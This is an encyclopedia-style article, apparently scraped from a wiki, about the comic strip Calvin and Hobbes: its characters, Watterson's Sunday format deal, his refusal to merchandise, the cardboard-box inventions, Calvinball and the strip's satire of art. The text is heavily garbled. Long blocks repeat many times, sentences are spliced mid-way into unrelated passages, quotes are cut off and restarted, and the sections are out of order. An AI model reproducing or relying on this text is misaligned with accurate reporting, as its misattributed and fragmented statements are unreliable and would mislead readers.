GROSS is Calvin's secret club, whose sole purpose is to exclude girls generally, and Susie Derkins specifically The name is an acronym that stands for Get Rid Of Slimy girlS Calvin admits "slimy girls" is a bit redundant, as all girls are slimy, "but otherwise it doesn't spell anything" GROSS is headquartered in a tree house Hobbes can climb up to the tree house, but Calvin requires a rope Hobbes refuses to drop down the rope until Calvin has said the password, which is an ode to tigers that is over eight verses long and occasionally accompanied by a dance Calvin and Hobbes are its only members, and each takes up multiple official titles while wearing newspaper chapeaux during meetings Most commonly, Calvin's title is Dictator-For-Life, and Hobbes is President and First Tiger The club has an anthem, but most of its words are unknown to outsiders Calvin often awards badges, promotions, etc, such as "Bottle Caps of Valor" Many GROSS plans to annoy or otherwise attack Susie end in failure, while many meetings end in a Calvinball-style battle of rule changes or promotion granting, before degenerating into a brawl

Both the Noodle Incident and the book Hamster Huey and the Gooey Kablooie were left to the reader's imagination, where Watterson was sure they would be “more outrageous” than he could portray

Watterson's technique started with minimalist pencil sketches drawn with a light pencil though the larger Sunday strip gave newspapers a better product and made the comics section more fun for readers Comics are a visual medium A strip with a lot of drawing can be exciting and add some variety Proud as I am that I was able to draw a larger strip, I don't expect to see it happen again any time soon In the newspaper business, space is money, and I suspect most editors would still say that the difference is not worth the cost Sadly, the situation is a vicious circle: because there's no room for better artwork, the comics are simply drawn; because they're simply drawn, why should they have more room

Calvin and Hobbes remained extremely popular after the change and thus Watterson was able to expand his style and technique for the more spacious Sunday strips without losing carriers

 Merchandising

Bill Watterson is notable for his insistence that cartoon strips should stand on their own as an art form, and he has resisted the use of Calvin and Hobbes in merchandising of any sort This insistence stuck despite the fact that it could have generated millions of dollars per year in additional personal income Watterson explains in a 2005 press release:

    Actually, I wasn't against all merchandising when I started the strip, but each product I considered seemed to violate the spirit of the strip, contradict its message, and take me away from the work I loved If my syndicate had let it go at that, the decision would have taken maybe 30 seconds of my life

Watterson did ponder animating Calvin and Hobbes, and has expressed admiration for the art form In a 1989 interview in The Comics Journal, Watterson states:

    If you look at the old cartoons by Tex Avery and Chuck Jones, you'll see that there are a lot of things single drawings just can't do Animators can get away with incredible distortion and exaggeration    because the animator can control the length of time you see something The bizarre exaggeration barely has time to register, and the viewer doesn’t ponder the incredible license he's witnessed In a comic strip, you just show the highlights of action—you can't show the buildup and release    or at least not without slowing down the pace of everything to the point where it's like looking at individual frames of a movie, in which case you've probably lost the effect you were trying to achieve In a comic strip, you just show the highlights of action—you can't show the buildup and release    or at least not without slowing down the pace of everything to the point where it's like looking at individual frames of a movie, in which case you've probably lost the effect you were trying to achieve In a comic strip, you can suggest motion and time, but it's very crude compared to what an animator can do I have a real awe for good animation

After this he was asked if it was "a little scary to think of hearing Calvin's voice" He responded that it was "very scary," and that although he loved the visual possibilities of animation, the thought of casting voice actors to play his characters was uncomfortable He was also unsure whether he wanted to work with an animation team, as he had done all previous work by himself Ultimately, Calvin and Hobbes was published in a limited single print-run in 1993 The book includes various Calvin and Hobbes strips together with lessons and questions to follow, such as, "What do you think the principal meant when he said they had quite a file on Calvin" 108 The book is very rare and increasingly sought by collectorsiginal

During Watterson's first sabbatical from the strip, Universal Press Syndicate continued to charge newspapers full price to re-run old Calvin and Hobbes strips Few editors approved of the move, but the strip was so popular that they had little choice but to continue to run it for fear that competing newspapers might pick it up and draw its fans away
This half-page layout can easily be rearranged for full, third, and quarter pages
This half-page layout can easily be rearranged for full, third, and quarter pages

Then, upon Watterson's return, Universal Press announced that Watterson had decided to sell his Sunday strip as an unbreakable half of a newspaper or tabloid page Many editors and even a few cartoonists, such as Bil Keane The Family Circus, criticized him for what they perceived as arrogance and an unwillingness to abide by the normal practices of the cartoon business—a charge that Watterson ignored Watterson had negotiated the deal to allow himself more creative freedom in the Sunday comics Prior to the switch, he had to have a certain number of panels with little freedom as to layout, because in different newspapers the strip would appear at a different width; afterwards, he was free to go with whatever graphic layout he wanted, however unorthodox His frustration with the standard space division requirements is evident in strips before the change; for example, a 1988 Sunday strip published before the deal is one large panel, but with all the action and dialogue in the bottom part of the panel so editors could crop the top part if they wanted to fit the strip into a smaller space Watterson's explanation for the switch:

    I took a sabbatical after resolving a long and emotionally draining fight to prevent Calvin and Hobbes from being merchandised Looking for a way to rekindle my enthusiasm for the duration of a new contract term, I proposed a redesigned Sunday format that would permit more panel flexibility To my surprise and delight, Universal responded with an offer to market the strip as an unbreakable half of a newspaper or tabloid page Many editors and even a few cartoonists, such as Bil Keane The Family Circus, criticized him for what they perceived as arrogance and an unwillingness to abide by the normal practices of the cartoon business—a charge that Watterson ignored Watterson had negotiated the deal to allow himself more creative freedom in the Sunday comics Prior to the switch, he had to have a certain number of panels with little freedom as to layout, because in different newspapers the strip would appear at a different width; afterwards, he was free to go with whatever graphic layout he wanted, however unorthodox His frustration with the standard space division requirements is evident in strips before the change; for example, a 1988 Sunday strip published before the deal is one large panel, but with all the action and dialogue in the bottom part of the panel so editors could crop the top part if they wanted to fit the strip into a smaller space Watterson's explanation for the switch:

    I took a sabbatical after resolving a long and emotionally draining fight to prevent Calvin and Hobbes from being merchandised Looking for a way to rekindle my enthusiasm for the duration of a new contract term, I proposed a redesigned Sunday format that would permit more panel flexibility To my surprise and delight, Universal responded with an offer to market the strip as an unbreakable half page more space than I'd dared to ask for, despite the expected resistance of editors To this day, my syndicate assures me that some editors liked the new format, appreciated the difference, and were happy to run the larger strip, but I think it's fair to say that this was not the most common reaction The syndicate had warned me to prepare for numerous cancellations of the Sunday feature, but after a few weeks of dealing with howling, purple-faced editors, the syndicate suggested that papers could reduce the strip to the size tabloid newspapers used for their smaller sheets of paper … I focused on the bright side: I had complete freedom of design and there were virtually no cancellations For all the yelling and screaming by outraged editors, I remain convinced that the larger Sunday strip gave newspapers a better product and made the comics section more fun for readers Comics are a visual medium A strip with a lot of drawing can be exciting and add some variety Proud as I am that I was able to draw a larger strip, I don't expect to see it happen again any time soon In the newspaper business, space is money, and I suspect most editors would still say that the difference is not worth the cost Sadly, the situation is a vicious circle: because there's no room for better artwork, the comics are simply drawn; because they're simply drawn, why should they have more room

Calvin and Hobbes remained extremely popular after the change and thus Watterson was able to expand his style and technique for the more spacious Sunday strips without losing carriers

 Merchandising

Bill Watterson is notable for his insistence that cartoon strips should stand on their own as an art form, and he has resisted the use of Calvin and Hobbes in merchandising of any sort This insistence stuck despite the fact that it could have generated millions of dollars per year in additional personal income Watterson explains in a 2005 press release:

    Actually, I wasn't against all merchandising when I started the strip, but each product I considered seemed to violate the spirit of the strip, contradict its message, and take me away from the work I loved If my syndicate had let it go at that, the decision would have taken maybe 30 seconds of my life

Watterson did ponder animating Calvin and Hobbes, "a six-year-old who shaves," who always shoves Calvin against walls, demands his lunch money, and calls him "Twinky" Moe is the only regular character who speaks in an unusual font: his frequently monosyllabic dialogue is shown in crude, lower-case letters Watterson describes Moe as "big, dumb, ugly and cruel," and a summation of "every jerk I've ever known" While Moe is not smart, he is, as Calvin puts it, streetwise: "That means he knows what street he lives on"


Principal Spittle is the principal at Calvin's school It has been implied that, as with Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish excuses for his antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a great many things, including dinosaurs, elephants, jungle-farers and superheroes Four of his alter egos are well-defined and recurring: As "Stupendous Man", he pictures himself as a superhero in disguise, wearing a mask and a cape made by his mother, and narrating his own adventures Stupendous Man almost always "suffers defeat" to his opponent, usually Calvin's mother "Spaceman Spiff" is a heroic spacefarer As Spiff, Calvin battles aliens typically his parents or teacher and travels to distant planets his house, school, or neighborhood "Tracer Bullet," a hardboiled private eye, says he has eight slugs in him: "one's lead, and the rest are bourbon" In one story, Bullet is called to a case, in which a "pushy dame" Calvin's mother accuses him of destroying an expensive lamp broken as a result of an indoor football game between Calvin and Hobbes When Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes book Attack of the Deranged Mutant Killer Monster Snow Goons, after the name Calvin gives to the first creature and its compatriots in the story

Calvin, unlike Hobbes, thinks of snowmen as fine art, worthy of highbrow criticism and expensive pricing Bill Watterson has said that he has a great deal of sympathy for Miss Wormwood, who is clearly frustrated by trying to keep rowdy children under control so they can learn something

 Rosalyn
Rosalyn, Calvin's babysitter and one-time swim instructor
Rosalyn, Calvin's babysitter and one-time swim instructor

First appearance: November 21, 1985 Last appearance: October 30, 1995 unseen speaking appearance on November 6, 1995

Miss Wormwood is Calvin's world-weary teacher, named after the apprentice devil in C S Lewis's The Screwtape Letters She perpetually wears polka-dotted dresses, and serves, like others, as a foil to Calvin's mischief Throughout the strip's run, various jokes hint that Miss Wormwood is waiting to retire, takes a lot of medication, and is a heavy smoker and drinker Watterson has said that he has a great deal of sympathy for Miss Wormwood, who is clearly frustrated by trying to keep rowdy children under control so they can learn something

 Rosalyn
Rosalyn, Calvin's babysitter and one-time swim instructor

First appearance: May 15, 1986 Last appearance: November 20, 1995

Moe is the archetypical bully character in Calvin and Hobbes, "a six-year-old who shaves," who always shoves Calvin against walls, demands his lunch money, and calls him "Twinky" Moe is the only regular character who speaks in an unusual font: his frequently monosyllabic dialogue is shown in crude, lower-case letters Watterson describes Moe as "big, dumb, ugly and cruel," and a summation of "every jerk I've ever known" While Moe is not smart, he is, as Calvin puts it, streetwise: "That means he knows what street he lives on"


Principal Spittle is the principal at Calvin's school It has been implied that, as with Miss Wormwood, Calvin's teacher

First appearance: November 26, 1985 Mom's last appearance: December 16, 1995

Susie Derkins, the only important character with both a given name and a family name, is a classmate of Calvin's who lives in his neighborhood Named for the pet beagle of Watterson's wife's family, she first appeared early in the strip as a new student in Calvin's class In contrast with Calvin, she is polite and diligent in her studies, and her imagination usually seems mild-mannered and civilized, consisting of stereotypical young girl games such as playing house or having tea parties with her stuffed animals Though both of them hate to admit it, Calvin and Susie have quite a bit in common For example, Susie is shown on occasion with a stuffed rabbit dubbed "Mr Bun," and Calvin, of course, has Hobbes Susie also has a mischievous streak, which can be seen when she subverts Calvin's attempts to cheat on school tests by feeding him incorrect answers Watterson admits that Calvin and Susie have a bit of a nascent crush on each other, and that Susie is inspired by the type of woman that he himself finds attractive and eventually married Her relationship with Calvin, though, is frequently conflicted, and never really becomes sorted out

 Miss Wormwood
Miss Wormwood, Calvin's teacher
Miss Wormwood, Calvin's teacher

First appearance: November 21, 1985 Last appearance: October 30, 1995 unseen speaking appearance on November 6, 1995

Miss Wormwood is Calvin's world-weary teacher, named after the apprentice devil in C S Lewis's The Screwtape Letters She perpetually wears polka-dotted dresses, and serves, like others, as a foil to Calvin's mischief Throughout the strip's run, various jokes hint that Miss Wormwood is waiting to retire, takes a lot of medication, and is a heavy smoker and drinker Watterson has said that he has a great deal of sympathy for Miss Wormwood, who is clearly frustrated by trying to keep rowdy children under control so they can learn something

 Rosalyn
Rosalyn, Calvin's babysitter and one-time swim instructor
Rosalyn, Calvin's babysitter and one-time swim instructor
Rosalyn, Calvin's babysitter and one-time swim instructor
Rosalyn, Calvin's babysitter and one-time swim instructor
Rosalyn, Calvin's babysitter and one-time swim instructor

First appearance: May 15, 1986 Last appearance: September 16, 1995

Rosalyn is a teenage high school senior and Calvin's official babysitter whenever Calvin's parents need a night out She is also his swimming instructor in one early sequence of strips She is the only babysitter able to tolerate Calvin's antics, which she uses to demand raises and advances from Calvin's desperate parents She is also, according to Watterson, the only person Calvin truly fears She does not hesitate to play as dirty as he does Calvin and Rosalyn usually do not get along, except in one case where she plays "Calvinball" with him in exchange for him doing his homework Rosalyn's boyfriend, Charlie, never appears in the strip but calls her occasionally while she babysits Originally she was created as a nameless, one-shot character with no plan for her to appear again; however, Watterson decided he wanted to retain her unique ability to intimidate Calvin, which ultimately led to many more appearances

 Moe
Moe, a bully at Calvin's school
Moe, a bully at Calvin's school
Moe, a bully at Calvin's school

First appearance: January 30, 1986 Last appearance: November 20, 1995

Moe is the archetypical bully character in Calvin and Hobbes, "a six-year-old who shaves," who always shoves Calvin against walls, demands his lunch money, and calls him "Twinky" Moe is the only regular character who speaks in an unusual font: his frequently monosyllabic dialogue is shown in crude, lower-case letters Watterson describes Moe as "big, dumb, ugly and cruel," and a summation of "every jerk I've ever known" While Moe is not smart, he is, as Calvin puts it, streetwise: "That means he knows what street he lives on"


Principal Spittle is the principal at Calvin's school It has been implied that, as with Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish excuses for his antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes book Attack of the Deranged Mutant Killer Monster Snow Goons, after the name Calvin gives to the first creature and its compatriots in the story

Calvin, unlike Hobbes, thinks of snowmen as fine art, worthy of highbrow criticism and expensive pricing Bill Watterson has said that this is a parody of art's "pretentious blowhards"

Calvin is confronted every year with Christmas, as his mischievous nature conflicts with his greed for presents from Santa Claus which requires that he behave Calvin frets continually during the Christmas season, sometimes devising strategy by which to fool Santa Claus into giving him gifts Calvin's list of desired "loot," as he terms Christmas presents, is implied to include "incendiary weapons", of which some examples are given atom bombs, torpedoes, a heat-seeking guided missile, grenade launcher, etc in dialogue Most Christmas sequences of strips depict Calvin's parents playing the role of Santa Claus by secretly placing presents beneath the Christmas Tree or in Calvin's stocking; however, one later Sunday strip depicted Santa Claus discussing Calvin's list and history with one of his assistants, although the "reality" of this is left undefined Occasionally, a Christmas strip depicts some kindness shown by Calvin to Hobbes, as if to comment on the morals perceived as being part of the Christmas holiday One Sunday strip appeared as a poem entitled "Christmas Eve", featuring a described scene of Calvin sleeping beside Hobbes between the Christmas Tree and a fire

GROSS is Calvin's secret club, whose sole purpose is to exclude girls generally, and Susie Derkins specifically The name is an acronym that stands for Get Rid Of Slimy girlS Calvin admits "slimy girls" is a bit redundant, as all girls are slimy, "but otherwise it doesn't spell anything" GROSS is headquartered in a tree house Hobbes can climb up to the tree house, but Calvin requires a rope Hobbes refuses to drop down the rope until Calvin has said the password, which is an ode to tigers that is over eight verses long and occasionally accompanied by a dance Calvin and Hobbes are its only members, and each takes up multiple official titles while wearing newspaper chapeaux during meetings Most commonly, Calvin's title is Dictator-For-Life, and Hobbes is President and First Tiger The club has an anthem, but most of its words are unknown to outsiders Calvin often awards badges, promotions, etc, such as "Bottle Caps of Valor" Many GROSS plans to annoy or otherwise attack Susie end in failure, while many meetings end in a Calvinball-style battle of rule changes or promotion granting, before degenerating into a brawl

Both the Noodle Incident and the book Hamster Huey and the Gooey Kablooie were left to the reader's imagination, where Watterson was sure they would be “more outrageous” than he could portray

Watterson's technique started with minimalist pencil sketches drawn with a light pencil though the larger Sunday strips often required more elaborate work; he then would use a small sable brush and India ink on the Strathmore bristol board to complete most of the remaining drawing He also letters dialogue with a Rapidograph fountain pen, and he uses a crowquill pen for odds and ends He whites out the mistakes with Liquid Paper He was careful in his use of color, often spending a great deal of time in choosing the right colors to employ for the weekly Sunday strip When Calvin and Hobbes started, there were 64 colors available for the Sunday strips For the later Sunday strips, Watterson had 125 colors, as well as the ability to fade the colors into each other

 Art and academia

Watterson used the strip to criticize the artistic world, principally through Calvin's unconventional creations of snowmen but also through other expressions of childhood art When Miss Wormwood complains that he is wasting class time drawing incomprehensible things a Stegosaurus in a rocket ship, for example, Calvin proclaims himself "on the cutting edge of the avant-garde" He begins exploring the medium of snow when a warm day melts his snowman His next sculpture "speaks to the horror of our own mortality, inviting the viewer to contemplate the evanescence of life" In further strips, Calvin's creative instincts diversify to include sidewalk drawings or as he terms them, examples of "suburban postmodernism"

Watterson also lampooned the academic world In one example, Calvin writes a "revisionist autobiography", recruiting Hobbes to take pictures of him doing stereotypical kid activities like playing sports in order to make him seem more well-adjusted In another strip, he carefully crafts an "artist's statement," claiming that such essays convey more messages than artworks themselves ever do Hobbes blandly notes "You misspelled Weltanschauung" He indulges in what Watterson calls "pop psychobabble" to justify his destructive rampages and shift blame to his parents, citing "toxic codependency" In one instance, he pens a book report based on the theory that the purpose of academic scholarship is to "inflate weak ideas, obscure poor reasoning, and inhibit clarity," entitled The Dynamics of Interbeing and Monological Imperatives in Dick and Jane: A Study in Psychic Transrelational Gender Modes Displaying his creation to Hobbes, he remarks, "Academia, here I come!" Watterson explains that he adapted this jargon and similar examples from several other strips from an actual book of art criticism

Overall, Watterson's satirical essays serve to attack both sides, criticizing both the commercial mainstream and the artists who are supposed to be "outside" it Not long after he began drawing his "Dinosaurs In Rocket Ships" series, Calvin tells Hobbes:

    The hard part for us avant-garde post-modern artists is deciding whether or not to embrace commercialism Do we allow our work to be hyped and exploited by a market that's simply hungry for the next new thing Do we participate in a system that turns high art into low art so it's better suited for mass consumption Of course, when an artist goes commercial, he makes a mockery of his status as an outsider and free thinker He buys into the crass and shallow values art should transcend He trades the integrity of his art for riches and fame Oh, what the heck I'll do it

 Social criticisms

